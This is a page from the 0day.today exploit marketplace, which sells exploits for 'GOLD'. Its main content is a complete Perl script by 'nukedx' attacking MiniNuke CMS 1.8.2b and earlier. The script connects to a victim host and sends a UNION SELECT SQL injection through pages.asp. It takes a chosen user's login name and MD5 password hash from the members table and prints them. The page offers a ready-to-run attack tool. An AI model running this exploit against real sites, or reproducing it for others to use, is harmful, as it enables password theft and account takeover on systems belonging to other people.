0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit
=========================================================== MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit =========================================================== #!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Orginal advisory: http://www.nukedx.com/?viewdoc=9 #Usage: mini.pl <victim.com> </mininuke-dir> <userid> use IO::Socket; if(@ARGV != 3){ print " +**********************************************************************+ +Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+ + Usage: mini.pl <victim> <directory> <userid> + + Example: mini.pl sux.com / 1 + + Method found & Exploit scripted by nukedx + +**********************************************************************+ "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $port = "80"; $mndir = $ARGV[1]; $victimid = $ARGV[2]; $sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $mns "GET $sreq\n"; print $mns "Host: $server\n"; print $mns "Accept: */*\n"; print $mns "Connection: close\n\n"; print "+ Connected!...\n"; while($answer = <$mns>) { if ($answer =~ /([\d,a-f]{32})/) { print "+ USERID: $victimid\n"; print "+ MD5 HASH: $1\n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /number of columns/) { print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n"; print "+ So please edit query by manually adding null data..\n"; exit(); } } print "+ Exploit failed\n"; print "+**********************************************************************+\n"; # 0day.today [2024-11-15] #